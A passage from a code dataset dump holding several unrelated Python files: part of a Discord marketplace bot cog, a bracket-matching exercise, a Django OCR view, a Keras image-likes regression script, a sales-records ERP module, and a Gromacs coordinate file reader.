g=color[1], b=color[2]))\r\n buttons = [\r\n [messages[\"btns\"][0], None, nextcord.ButtonStyle.secondary, \"menu\", 1, None, False],\r\n ]\r\n await msg.edit(f\"<@{user.id}>\", embed=emb, view=ViewButton(self.bot, buttons))\r\n\r\n await db[\"products\"].update_one({\"_id\": products['_id']}, {\"$set\": {\"price\": price, \"thread\": thread.id}})\r\n\r\n\r\nclass Button(nextcord.ui.Button[\"ViewButton\"]):\r\n def __init__(self, bot: commands.Bot, *args):\r\n super().__init__(label=args[0], emoji=args[1], style=args[2], custom_id=args[3], row=args[4], url=args[5], disabled=args[6])\r\n self.bot = bot\r\n\r\n async def callback(self, interaction: nextcord.Interaction):\r\n command = self.custom_id\r\n\r\n if command[:11] == \"show_hidden\":\r\n suffix = int(command[12:])\r\n command = command[:11]\r\n elif command[:4] == 
\"show\":\r\n suffix = int(command[5:])\r\n command = command[:4]\r\n elif command[:4] == \"sell\":\r\n suffix = int(command[5:])\r\n command = command[:4]\r\n\r\n color, messages = config_get(\"color\"), message_get(command)\r\n user, channel = interaction.user, interaction.channel\r\n\r\n if command == \"open\":\r\n if await db[\"users\"].find_one({ \"_id\": user.id }) == None:\r\n await db[\"users\"].insert_one({\r\n \"_id\": user.id,\r\n \"balance\": 10,\r\n \"message\": 0,\r\n \"thread\": 0,\r\n \"action\": \"menu\"\r\n })\r\n balance = 10\r\n member = await interaction.guild.fetch_member(user.id)\r\n catalog = interaction.guild.get_channel(config_get(\"catalog\"))\r\n await catalog.set_permissions(member, read_messages=True)\r\n else:\r\n user_db = await db[\"users\"].find_one({ \"_id\": user.id })\r\n thread, balance = user_db[\"thread\"], user_db[\"balance\"]\r\n await channel.get_thread(thread).delete()\r\n await db[\"creations\"].delete_one({\"_id\": user.id})\r\n\r\n thread = await channel.create_thread(name=f\"menu ({user.name})\",\r\n auto_archive_duration=1440,\r\n type=nextcord.ChannelType.private_thread,\r\n reason=None)\r\n emb = nextcord.Embed(title=messages[\"title\"]+user.name,\r\n description=messages[\"desc\"]+str(balance),\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n buttons = [\r\n [messages[\"btns\"][0], None, nextcord.ButtonStyle.success, \"show_0\", 1, None, False],\r\n [messages[\"btns\"][1], None, nextcord.ButtonStyle.primary, \"create\", 1, None, False],\r\n ]\r\n msg = await thread.send(f\"<@{user.id}>\", embed=emb, view=ViewButton(self.bot, buttons))\r\n\r\n await db[\"users\"].update_one({\"_id\": user.id}, {\"$set\": {\"message\": msg.id, \"thread\": thread.id, \"action\": \"menu\"}})\r\n\r\n elif command == \"menu\":\r\n messages = message_get(\"open\")\r\n user_db = await db[\"users\"].find_one({\"_id\": user.id})\r\n msg = await channel.fetch_message(user_db[\"message\"])\r\n await db[\"creations\"].delete_one({\"_id\": user.id})\r\n\r\n emb = nextcord.Embed(title=messages[\"title\"]+user.name,\r\n description=messages[\"desc\"]+str(user_db[\"balance\"]),\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n buttons = [\r\n [messages[\"btns\"][0], None, nextcord.ButtonStyle.success, \"show_0\", 1, None, False],\r\n [messages[\"btns\"][1], None, nextcord.ButtonStyle.primary, \"create\", 1, None, False],\r\n ]\r\n await msg.edit(f\"<@{user.id}>\", embed=emb, view=ViewButton(self.bot, buttons))\r\n\r\n await db[\"users\"].update_one({\"_id\": user.id}, {\"$set\": {\"action\": \"menu\"}})\r\n\r\n elif command == \"show\":\r\n msg = await channel.fetch_message((await db[\"users\"].find_one({\"_id\": user.id}))[\"message\"])\r\n products = [i async for i in db[\"products\"].find({\"holder\": user.id, \"price\": 0})]\r\n if len(products) == 0:\r\n return await interaction.send(messages[\"text\"], ephemeral=True)\r\n\r\n emb = nextcord.Embed(title=f\"{suffix+1}/{len(products)}\",\r\n description=products[suffix][\"name\"],\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n buttons = [\r\n [messages[\"btns\"][0], None, nextcord.ButtonStyle.secondary, f\"show_{suffix-1}\", 1, None, True if suffix == 0 else False],\r\n [messages[\"btns\"][1], None, nextcord.ButtonStyle.success, f\"show_hidden_{suffix}\", 1, None, False],\r\n [messages[\"btns\"][2], None, nextcord.ButtonStyle.primary, f\"sell_{suffix}\", 1, None, False],\r\n [messages[\"btns\"][3], None, nextcord.ButtonStyle.secondary, 
f\"show_{suffix+1}\", 1, None, True if suffix+1 == len(products) else False],\r\n [messages[\"btns\"][4], None, nextcord.ButtonStyle.danger, \"menu\", 2, None, False],\r\n ]\r\n await msg.edit(f\"<@{user.id}>\", embed=emb, view=ViewButton(self.bot, buttons))\r\n \r\n elif command == \"create\":\r\n emOne = nextcord.ui.TextInput(\r\n label=messages[\"labels\"][0],\r\n min_length=4,\r\n max_length=32,\r\n required=True,\r\n custom_id=\"name\",\r\n style=nextcord.TextInputStyle.short\r\n )\r\n emTwo = nextcord.ui.TextInput(\r\n label=messages[\"labels\"][1],\r\n min_length=1,\r\n max_length=200,\r\n required=True,\r\n custom_id=\"privat\",\r\n style=nextcord.TextInputStyle.short\r\n )\r\n await interaction.response.send_modal(Modal(messages, self.bot, emOne=emOne, emTwo=emTwo))\r\n \r\n elif command == \"show_hidden\":\r\n products = [i async for i in db[\"products\"].find({\"holder\": user.id})]\r\n await interaction.send(products[suffix][\"privat\"], ephemeral=True)\r\n \r\n elif command == \"sell\":\r\n emOne = nextcord.ui.TextInput(\r\n label=messages[\"labels\"][0],\r\n min_length=1,\r\n max_length=5,\r\n required=True,\r\n custom_id=f\"price_{suffix}\",\r\n style=nextcord.TextInputStyle.short\r\n )\r\n await interaction.response.send_modal(Modal(messages, self.bot, emOne=emOne))\r\n\r\n elif command == \"buy\":\r\n product = await db[\"products\"].find_one({\"thread\": channel.id})\r\n user_db = await db[\"users\"].find_one({\"_id\": user.id})\r\n holder_db = await db[\"users\"].find_one({\"_id\": product[\"holder\"]})\r\n\r\n if user_db[\"balance\"] >= product[\"price\"]:\r\n emb = nextcord.Embed(title=messages[\"title\"],\r\n description=product[\"privat\"],\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n await interaction.send(embed=emb, ephemeral=True)\r\n\r\n catalog_channel = interaction.guild.get_channel(config_get(\"catalog\"))\r\n thread = catalog_channel.get_thread(channel.id)\r\n await thread.edit(archived=True, locked=True)\r\n\r\n await db[\"products\"].update_one({\"_id\": product['_id']}, {\"$set\": {\"price\": 0, \"holder\": user.id, \"thread\": \"\"}})\r\n await db[\"users\"].update_one({\"_id\": holder_db[\"_id\"]}, {\"$set\": {\"balance\": holder_db[\"balance\"]+product[\"price\"]}})\r\n await db[\"users\"].update_one({\"_id\": user.id}, {\"$set\": {\"balance\": user_db[\"balance\"]-product[\"price\"]}})\r\n\r\n else:\r\n await interaction.send(messages[\"text\"], ephemeral=True)\r\n\r\n elif command == \"take_off\":\r\n product = await db[\"products\"].find_one({\"thread\": channel.id})\r\n if product[\"holder\"] == user.id:\r\n catalog_channel = interaction.guild.get_channel(config_get(\"catalog\"))\r\n thread = catalog_channel.get_thread(channel.id)\r\n await thread.edit(archived=True, locked=True)\r\n await db[\"products\"].update_one({\"_id\": product['_id']}, {\"$set\": {\"price\": 0, \"thread\": \"\"}})\r\n\r\n else:\r\n await interaction.send(messages[\"text\"], ephemeral=True)\r\n\r\n\r\nclass ViewButton(nextcord.ui.View):\r\n def __init__(self, bot: commands.Bot, elem: list):\r\n super().__init__(timeout = None)\r\n [self.add_item(Button(bot, elem[i][0], elem[i][1], elem[i][2], elem[i][3], elem[i][4], elem[i][5], elem[i][6])) for i in range(len(elem))]\r\n\r\n\r\nclass Menu(commands.Cog):\r\n def __init__(self, bot: commands.Bot):\r\n self.bot = bot\r\n\r\n @commands.Cog.listener()\r\n async def on_ready(self):\r\n custom_ids = [\"open\", \"menu\", \"show_0\", \"create\", \"buy\", \"take_off\"]\r\n 
[self.bot.add_view(ViewButton(bot=self.bot, elem=[[None, None, None, i, 1, None, None]])) for i in custom_ids]\r\n\r\n @nextcord.slash_command()\r\n @application_checks.is_owner()\r\n async def menu_setting(self, interaction: nextcord.Interaction):\r\n color, messages = config_get(\"color\"), message_get(\"menu_channel\")\r\n emb = nextcord.Embed(title=messages[\"title\"],\r\n description=messages[\"desc\"],\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n buttons = [\r\n [messages[\"btns\"][0], None, nextcord.ButtonStyle.success, \"open\", 1, None, False],\r\n ]\r\n channel = interaction.guild.get_channel(config_get(\"menu\"))\r\n await channel.send(embed=emb, view=ViewButton(self.bot, buttons))\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Menu(bot))","repo_name":"belkinark/Discord-Market","sub_path":"cogs/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":13266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
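The on_ready hook above re-registers ViewButton instances so that old buttons keep working after the bot restarts. In nextcord this persistent-view pattern rests on two requirements: the view is constructed with timeout=None, and every component carries a stable custom_id. A stripped-down sketch of the same idea (hypothetical label and ids; the decorator's (button, interaction) parameter order follows nextcord's discord.py-1.x-style API and should be treated as an assumption):

# Sketch: persistent view — timeout=None plus fixed custom_ids is what lets
# bot.add_view() re-attach callbacks to messages sent before a restart.
import nextcord
from nextcord.ext import commands

class PingView(nextcord.ui.View):
    def __init__(self):
        super().__init__(timeout=None)

    @nextcord.ui.button(label='ping', custom_id='ping_button')
    async def ping(self, button: nextcord.ui.Button, interaction: nextcord.Interaction):
        await interaction.response.send_message('pong', ephemeral=True)

bot = commands.Bot(command_prefix='!')

@bot.event
async def on_ready():
    bot.add_view(PingView())  # re-register so old buttons resolve again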
+{"seq_id":"42507932019","text":"expressão = input('Digite sua expressão aqui: ')\npilha = []\nfor simbolo in expressão:\n if simbolo == '(':\n pilha.append(simbolo)\n elif simbolo == ')':\n if len(pilha) > 0:\n pilha.pop()\n else:\n pilha.append(')')\nif len(pilha) == 0:\n print('Sua experssão está certa!')\nelse:\n print('Sua expressão está errada...')\n","repo_name":"Thalesamaojapa/Thales---Python","sub_path":"Exercícios_Main/Exercícios/Exercício83(ValidaçãoDeExpressão).py","file_name":"Exercício83(ValidaçãoDeExpressão).py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"37992662269","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import goovi_db\nfrom .forms import goovi_form\nimport io\nimport os\nfrom google.cloud import vision\nfrom google.cloud.vision import types\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\ndef goovi_api(filename):\n client = vision.ImageAnnotatorClient()\n with io.open(filename,'rb') as image_file:\n content = image_file.read()\n image = types.Image(content=content)\n response = client.text_detection(image=image)\n texts = response.text_annotations\n return texts[0].description\n\ndef index(request):\n if(request.method == 'POST'):\n y = goovi_form(request.POST,request.FILES)\n if(y.is_valid()):\n x = goovi_db()\n x.name = y.cleaned_data[\"name\"]\n x.file = y.cleaned_data[\"file\"]\n x.data = \"test data\"\n x.save()\n data = goovi_api(BASE_DIR+\"/goovi/\"+goovi_db.objects.get(name=y.cleaned_data[\"name\"]).file.url)\n context = {'form':y,'data':data }\n else:\n form = goovi_form()\n context = {'form':form}\n return render(request,\"index.html\",context)\n","repo_name":"sivajsp/OCR-App","sub_path":"goovi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39264276221","text":"from keras.layers import Conv2D, Activation, MaxPool2D, Flatten, Dense, Dropout\nfrom keras.models import Sequential\nfrom features import downloadimages, getlikes\nimport numpy as np\nimport cv2\nimport glob\n\n\nIMAGESIZE = (200, 200)\nTRAININGPERCENT = 0.7\n\n# downloadimages(src='../data/pickledump',\n# destination='../data/download/')\n\n# get likes array where Nth element corresponds to the number of likes\n# on image ../data/download/N.jpeg\nlikes = getlikes(src='../data/pickledump')\n\nlikesraw = np.array(likes)\nlikes = (likesraw - np.mean(likesraw))/np.std(likesraw) # normalize\n\nimages = []\n\n# read images and resize them\nfor imgfile in glob.glob('../data/download/*.jpeg'):\n img = cv2.imread(imgfile)\n resized = cv2.resize(img, IMAGESIZE)\n images.append(resized)\n\nimages = np.array(images)\n\n# partition training/testing sets\ntraining_num = int(TRAININGPERCENT * len(images))\n\nx_train = images[: training_num]\ny_train = likes[:training_num]\n\nx_test = images[training_num:]\ny_test = likes[training_num:]\n\n# create model and add layers\nmodel = Sequential()\n\nmodel.add(Conv2D(10, 5, 5, activation='relu',\n input_shape=(IMAGESIZE[0], IMAGESIZE[1], 3)))\n\nmodel.add(Conv2D(10, 5, 5, activation='relu'))\nmodel.add(MaxPool2D((5, 5)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(50))\nmodel.add(Activation('relu'))\nmodel.add(Dense(1))\n\nprint(model.summary())\n\nmodel.compile(loss='mse',\n optimizer='rmsprop')\n\nmodel.fit(x_train, y_train, epochs=10, shuffle=True,\n validation_data=(x_test, y_test))\n\nmodel.save('../models/regv1.h')\n\nscore = model.evaluate(x_test, y_test)\nprint('test set mse is {}'.format(score))\n","repo_name":"ninesalt/lipy","sub_path":"src/lipy.py","file_name":"lipy.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"3"}
+{"seq_id":"29093910772","text":"# global 关键\n# nonlocal 3.2 +\n\n# num +=1\n# 如果说我们在函数里使用global关键声明的变量 自动提升到全局作用域\nnum = 0\n\n\ndef test(n):\n global num\n num = num + 1\n print(num)\n\n\ntest(1)\n","repo_name":"zhangwei725/PythonBase","sub_path":"day07/函数_关键字_global.py","file_name":"函数_关键字_global.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"17144917486","text":"import os\nimport ui\nimport data_manager\nimport common\n\n\ndef start_module():\n while True:\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n options = [\n \"Display table\",\n \"Add\",\n \"Remove\",\n \"Update\",\n \"The ID of the item sold for the lowest price\",\n \"Items that are sold between two given dates\",\n \"Get the title of the item by ID\",\n \"Get the title of the item by ID from table\",\n \"Get the ID of the item sold last\",\n \"Get the ID of the item sold last from table\",\n \"Get the title of the item sold last from table\",\n \"Get the sum of prices of the given item IDs\",\n \"Get the sum of prices of the given item IDs from table\",\n \"Get the customer ID by the given sale ID\",\n \"Get the customer ID by the given sale ID from table\",\n \"Get all customer IDs\",\n \"Get all customer IDs from table\",\n \"Get all sales IDs for the customer IDs\",\n \"Get all sales IDs for the customer IDs from table\",\n \"Get the number of sales per customer IDs\",\n \"Get the number of sales per customer IDs from table\"]\n ui.print_menu(\"\\nSales menu\", options, \"Main menu\")\n inputs = ui.get_inputs([\"Please, choose an option: \"], \"\")\n option = inputs[0]\n if option == \"1\":\n os.system(\"clear\")\n show_table(datas)\n elif option == \"2\":\n os.system(\"clear\")\n add(datas)\n write_to_file(datas)\n elif option == \"3\":\n os.system(\"clear\")\n given_id = ui.get_inputs([\"Please, enter an ID to remove the line: \"], \"\")\n remove(datas, given_id)\n write_to_file(datas)\n elif option == \"4\":\n os.system(\"clear\")\n update_id = ui.get_inputs([\"Please, enter an ID to update the line: \"], \"\")\n update(datas, update_id)\n write_to_file(datas)\n elif option == \"5\":\n os.system(\"clear\")\n ui.print_result(get_lowest_price_item_id(datas), \"The ID of the item sold for the lowest price:\")\n elif option == \"6\":\n os.system(\"clear\")\n date_list = ui.get_inputs([\"Month from: \", \"Day from: \", \"Year from: \",\n \"Month to: \", \"Day to: \", \"Year to: \"], \"Please, add the dates!\")\n ui.print_result(\n get_items_sold_between(\n datas, int(\n date_list[0]), int(\n date_list[1]), int(\n date_list[2]), int(\n date_list[3]), int(\n date_list[4]), int(\n date_list[5])), \"Items that are sold between two given dates:\\n\")\n elif option == \"7\":\n os.system(\"clear\")\n given_id = ui.get_inputs([\"Please, enter an ID to get the title: \"], \"\")\n ui.print_result(get_title_by_id(given_id[0]), \"The title of the item by ID:\")\n elif option == \"8\":\n os.system(\"clear\")\n given_id = ui.get_inputs([\"Please, enter an ID to get the title: \"], \"\")\n ui.print_result(get_title_by_id_from_table(datas, given_id[0]), \"The title of the item by ID:\")\n elif option == \"9\":\n os.system(\"clear\")\n ui.print_result(get_item_id_sold_last(), \"The ID of the item sold last:\")\n elif option == \"10\":\n os.system(\"clear\")\n ui.print_result(get_item_id_sold_last_from_table(datas), \"The ID of the item sold last:\")\n elif option == \"11\":\n os.system(\"clear\")\n ui.print_result(get_item_title_sold_last_from_table(datas), \"The title of the item sold last:\")\n elif option == \"12\":\n os.system(\"clear\")\n given_ids = ui.get_inputs(\n [\"Please, enter the IDs (seperated by comma) to get the sum of the prices of the items: \"], \"\")\n splitted_given_ids = given_ids[0].split(\",\")\n ui.print_result(get_the_sum_of_prices(splitted_given_ids), \"The sum of prices of the given item IDs:\")\n elif option == \"13\":\n 
os.system(\"clear\")\n given_ids = ui.get_inputs(\n [\"Please, enter the IDs (seperated by comma) to get the sum of the prices of the items: \"], \"\")\n splitted_given_ids = given_ids[0].split(\",\")\n ui.print_result(\n get_the_sum_of_prices_from_table(\n datas,\n splitted_given_ids),\n \"The sum of prices of the given item IDs:\")\n elif option == \"14\":\n os.system(\"clear\")\n given_id = ui.get_inputs([\"Please, enter the sale ID to get the customer ID: \"], \"\")\n ui.print_result(get_customer_id_by_sale_id(given_id[0]), \"The customer ID by the given sale ID:\")\n elif option == \"15\":\n os.system(\"clear\")\n given_id = ui.get_inputs([\"Please, enter the sale ID to get the customer ID: \"], \"\")\n ui.print_result(\n get_customer_id_by_sale_id_from_table(\n datas,\n given_id[0]),\n \"The customer ID by the given sale ID:\")\n elif option == \"16\":\n os.system(\"clear\")\n ui.print_result(get_all_customer_ids(), \"All customer IDs:\")\n elif option == \"17\":\n os.system(\"clear\")\n ui.print_result(get_all_customer_ids_from_table(datas), \"All customer IDs:\")\n elif option == \"18\":\n os.system(\"clear\")\n ui.print_result(get_all_sales_ids_for_customer_ids(), \"All sale IDs for the customer IDs:\")\n elif option == \"19\":\n os.system(\"clear\")\n ui.print_result(get_all_sales_ids_for_customer_ids_from_table(datas), \"All sale IDs for the customer IDs:\")\n elif option == \"20\":\n os.system(\"clear\")\n ui.print_result(get_num_of_sales_per_customer_ids(), \"The number of sales per customer IDs:\")\n elif option == \"21\":\n os.system(\"clear\")\n ui.print_result(\n get_num_of_sales_per_customer_ids_from_table(datas),\n \"The number of sales per customer IDs:\")\n elif option == \"0\":\n os.system(\"clear\")\n break\n else:\n ui.print_error_message(\"There is no such option.\")\n\n\ndef show_table(table):\n module_headers = [\"ID\", \"Title\", \"Price\", \"Month\", \"Day\", \"Year\", \"Customer ID\"]\n return common.common_show_table(table, module_headers)\n\n\ndef add(table):\n module_headers = [\"Title: \", \"Price: \", \"Month: \", \"Day: \", \"Year: \", \"Customer ID: \"]\n return common.common_add(table, module_headers)\n\n\ndef write_to_file(table):\n return common.common_write_to_file(table, \"sales/sales.csv\")\n\n\ndef remove(table, id_):\n return common.common_remove(table, id_, \"sales/sales.csv\")\n\n\ndef update(table, id_):\n module_headers = [\"Title: \", \"Price: \", \"Month: \", \"Day: \", \"Year: \", \"Customer ID: \"]\n return common.common_update(table, id_, \"sales/sales.csv\", module_headers)\n\n\ndef get_lowest_price_item_id(table):\n prices = []\n lowest_ids = []\n for row in table:\n prices.append(int(row[2]))\n for row in table:\n if int(row[2]) == min(prices):\n lowest_ids.append(row[0])\n\n N = len(lowest_ids)\n iteration = 1\n while iteration < N:\n j = 0\n while j <= (N - 2):\n if lowest_ids[j] < lowest_ids[j + 1]:\n temp = lowest_ids[j + 1]\n lowest_ids[j + 1] = lowest_ids[j]\n lowest_ids[j] = temp\n j += 1\n else:\n j += 1\n iteration += 1\n return str(lowest_ids[0])\n\n\ndef get_items_sold_between(table, month_from, day_from, year_from, month_to, day_to, year_to):\n date_from = (year_from, month_from, day_from)\n date_to = (year_to, month_to, day_to)\n between_dates = []\n filtered_table = []\n for i in range(len(table)):\n actual_month = int(table[i][3])\n actual_day = int(table[i][4])\n actual_year = int(table[i][5])\n actual_date = (actual_year, actual_month, actual_day)\n if date_from < actual_date < date_to:\n 
between_dates.append(list(actual_date))\n for i in range(len(table)):\n for date in between_dates:\n table[i][5] = int(table[i][5])\n table[i][3] = int(table[i][3])\n table[i][4] = int(table[i][4])\n table[i][2] = int(table[i][2])\n if date[0] == table[i][5] and date[1] == table[i][3] and date[2] == table[i][4]:\n filtered_table.append(table[i])\n return filtered_table\n\n\ndef get_title_by_id(id):\n\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_title_by_id_from_table(datas, id)\n\n\ndef get_title_by_id_from_table(table, id):\n\n for i in range(len(table)):\n if table[i][0] == id:\n return table[i][1]\n\n\ndef get_item_id_sold_last():\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_item_id_sold_last_from_table(datas)\n\n\ndef get_item_id_sold_last_from_table(table):\n dates = []\n for i in range(len(table)):\n month = int(table[i][3])\n day = int(table[i][4])\n year = int(table[i][5])\n date = (year, month, day)\n dates.append(date)\n for i in range(len(table)):\n month = int(table[i][3])\n day = int(table[i][4])\n year = int(table[i][5])\n if (year, month, day) == max(dates):\n return table[i][0]\n\n\ndef get_item_title_sold_last_from_table(table):\n dates = []\n for i in range(len(table)):\n month = int(table[i][3])\n day = int(table[i][4])\n year = int(table[i][5])\n date = (year, month, day)\n dates.append(date)\n for i in range(len(table)):\n month = int(table[i][3])\n day = int(table[i][4])\n year = int(table[i][5])\n if (year, month, day) == max(dates):\n return table[i][1]\n\n\ndef get_the_sum_of_prices(item_ids):\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_the_sum_of_prices_from_table(datas, item_ids)\n\n\ndef get_the_sum_of_prices_from_table(table, item_ids):\n sum_of_items_price = 0\n for i in range(len(table)):\n if table[i][0] in item_ids:\n sum_of_items_price += int(table[i][2])\n return sum_of_items_price\n\n\ndef get_customer_id_by_sale_id(sale_id):\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_customer_id_by_sale_id_from_table(datas, sale_id)\n\n\ndef get_customer_id_by_sale_id_from_table(table, sale_id):\n for i in range(len(table)):\n if table[i][0] == sale_id:\n return table[i][6]\n\n\ndef get_all_customer_ids():\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_all_customer_ids_from_table(datas)\n\n\ndef get_all_customer_ids_from_table(table):\n customer_ids = []\n for i in range(len(table)):\n customer_ids.append(table[i][6])\n return set(customer_ids)\n\n\ndef get_all_sales_ids_for_customer_ids():\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_all_sales_ids_for_customer_ids_from_table(datas)\n\n\ndef get_all_sales_ids_for_customer_ids_from_table(table):\n ids = set()\n dict_ids = {}\n for line in table:\n ids.add(line[6])\n for item in ids:\n dict_ids[item] = []\n for line in table:\n actual_value = dict_ids[line[6]]\n actual_value.append(line[0])\n dict_ids[line[6]] = actual_value\n return dict_ids\n\n\ndef get_num_of_sales_per_customer_ids():\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_num_of_sales_per_customer_ids_from_table(datas)\n\n\ndef get_num_of_sales_per_customer_ids_from_table(table):\n id_connections = {}\n for i in range(len(table)):\n if table[i][6] in id_connections:\n id_connections[table[i][6]] += 1\n else:\n id_connections[table[i][6]] = 1\n return 
id_connections\n","repo_name":"AlexaPekar/codecool-pbwp-3rd-tw-lightweight-erp","sub_path":"sales/sales.py","file_name":"sales.py","file_ext":"py","file_size_in_byte":12138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
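A note on get_lowest_price_item_id in the sales.py record above: the hand-rolled bubble sort only serves to pick, among the rows that share the minimum price, the ID that sorts last as a string (the list is sorted descending and element 0 is returned). A minimal equivalent sketch, assuming the same row layout [id, title, price, month, day, year, customer_id]:

def get_lowest_price_item_id(table):
    # find the minimum price over all rows
    lowest = min(int(row[2]) for row in table)
    # collect the IDs of all rows tied at that price
    tied_ids = [row[0] for row in table if int(row[2]) == lowest]
    # the descending bubble sort + [0] in the original is just the string maximum
    return str(max(tied_ids))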
+{"seq_id":"33399767036","text":"import sys\n\nfrom pCore import logFile , \\\n LogFileActive , \\\n TextFileReader\nfrom pScientific.Geometry3 import Coordinates3\nfrom pScientific.Symmetry import SymmetryParameters\nfrom .ExportImport import _Importer\n\n#===================================================================================================================================\n# . Class.\n#===================================================================================================================================\nclass GromacsCrdFileReader ( TextFileReader ):\n \"\"\"Class for reading Gromacs .gro coordinate files.\"\"\"\n\n _classLabel = \"Gromacs Crd File Reader\"\n\n def GetAtomLineFormat ( self ):\n \"\"\"Get the format of the atom lines.\n\n This is:\n RESNO RES TYPE ATOMNO X Y Z \n I5 A4 2X A4 I5 F8.3 F8.3 F8.3 \n \"\"\"\n a = 4 ; f = 8 ; i = 5 ; x = 2\n p = 0\n format = [ ( p, p+i, int , 0 ) ] ; p += i # . Res. number.\n format.append ( ( p, p+a, None , \"\" ) ) ; p += (a+x) # . Res. name.\n format.append ( ( p, p+a, None , \"\" ) ) ; p += (a+i) # . Atom name.\n format.append ( ( p, p+f, float, 0.0 ) ) ; p += f # . X.\n format.append ( ( p, p+f, float, 0.0 ) ) ; p += f # . Y.\n format.append ( ( p, p+f, float, 0.0 ) ) # . Z.\n return format\n\n def Parse ( self, log = logFile ):\n \"\"\"Parsing.\"\"\"\n if not self.isParsed:\n # . Initialization.\n if LogFileActive ( log ): self.log = log\n # . Get the atom line format.\n atomlineformat = self.GetAtomLineFormat ( )\n # . Open the file.\n self.Open ( )\n # . Parse all the lines.\n try:\n # . Keyword line.\n self.title = self.GetLine ( )\n # . Number of atoms.\n items = self.GetTokens ( converters = ( int, ) )\n natoms = items[0]\n # . The coordinate data.\n self.xyz = Coordinates3.WithExtent ( natoms )\n for n in range ( natoms ):\n tokens = self.GetFixedFormatTokens ( *atomlineformat )\n for i in range ( 3 ): self.xyz[n,i] = float ( tokens[i+3]*10.0 )\n # . Symmetry data.\n self.symmetryItems = self.GetTokens ( )\n except EOFError:\n pass\n # . Close the file.\n self.WarningStop ( )\n self.Close ( )\n # . Set the parsed flag and some other options.\n self.log = None\n self.isParsed = True\n\n @classmethod\n def PathToCoordinates3 ( selfClass, path, log = logFile ):\n \"\"\"Return the coordinates from a file.\"\"\"\n inFile = selfClass.FromPath ( path )\n inFile.Parse ( log = log )\n inFile.Summary ( log = log )\n return inFile.ToCoordinates3 ( )\n\n @classmethod\n def PathToSymmetryParameters ( selfClass, path, log = logFile ):\n \"\"\"Return the symmetry paramters from a file.\"\"\"\n inFile = selfClass.FromPath ( path )\n inFile.Parse ( log = log )\n inFile.Summary ( log = log )\n return inFile.ToSymmetryParameters ( )\n\n def SummaryItems ( self ):\n \"\"\"Summary items.\"\"\"\n items = []\n if self.isParsed:\n items.append ( ( \"Atom Lines\", \"{:d}\".format ( self.xyz.rows ) ) )\n return items\n\n def ToCoordinates3 ( self ):\n \"\"\"Return the coordinates.\"\"\"\n if self.isParsed: return self.xyz\n else: return None\n\n def ToSymmetryParameters ( self ):\n \"\"\"Return the symmetry parameters.\"\"\"\n # . Will assign only cubic, orthorhombic, dodecahedron or octahedron boxes. \n # . Will fail for general triclinic, but this could be hard-coded once sizes/angles are known.\n if self.isParsed: \n # . 
triclinic box\n items = self.symmetryItems\n if len ( items ) == 9: \n specialTriclinic = items[8] == items[7] or \"-\" + items[7] == items[5]\n if not specialTriclinic: self.Warning ( \"Invalid general triclinic box symmetry.\", True )\n # . Dodecahedron \n if items[0] == items[1]:\n alpha = 60.0\n beta = 60.0\n gamma = 90.0\n # . Octahedron\n else: \n alpha = 70.53\n beta = 109.47\n gamma = 70.53\n a = float ( items[0] ) * 10.0\n b = a\n c = a\n # . Cubic or orthorhombic box\n elif len ( items ) == 3 :\n alpha = 90.0\n beta = 90.0\n gamma = 90.0\n items = [ float ( items[i] ) * 10.0 for i in range(3) ]\n a = items[0]\n b = items[1]\n c = items[2]\n else: self.Warning ( \"Invalid or unrecognized box symmetry.\", True )\n self.symmetryParameters = SymmetryParameters ( )\n self.symmetryParameters.SetCrystalParameters ( a = a, b = b, c = c, alpha = alpha, beta = beta, gamma = gamma )\n return self.symmetryParameters\n else: return None\n\n#===================================================================================================================================\n# . Importer definitions.\n#===================================================================================================================================\n_Importer.AddHandler ( { Coordinates3 : GromacsCrdFileReader.PathToCoordinates3 } , [ \"gro\", \"GRO\" ], \"Gromacs Coordinates\" )\n\n#===================================================================================================================================\n# . Testing.\n#===================================================================================================================================\nif __name__ == \"__main__\":\n pass\n\n","repo_name":"pdynamo/pDynamo3","sub_path":"pBabel/GromacsCrdFileReader.py","file_name":"GromacsCrdFileReader.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"}
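To make the fixed-format slicing in GetAtomLineFormat concrete, here is a small sanity check on a synthetic (hypothetical) .gro atom line laid out with the same column positions the reader builds, including the nm-to-Angstrom scaling applied in Parse; the sample values and residue/atom names are made up for illustration:

# build a fixed-width line matching the reader's columns:
# resno [0:5], resname [5:9], 2 blanks, atom name [11:15], atom number [15:20], x/y/z in 8.3f
line = "%5d%-4s  %4s%5d%8.3f%8.3f%8.3f" % (1, "SOL", "OW", 1, 0.230, 0.628, 0.113)
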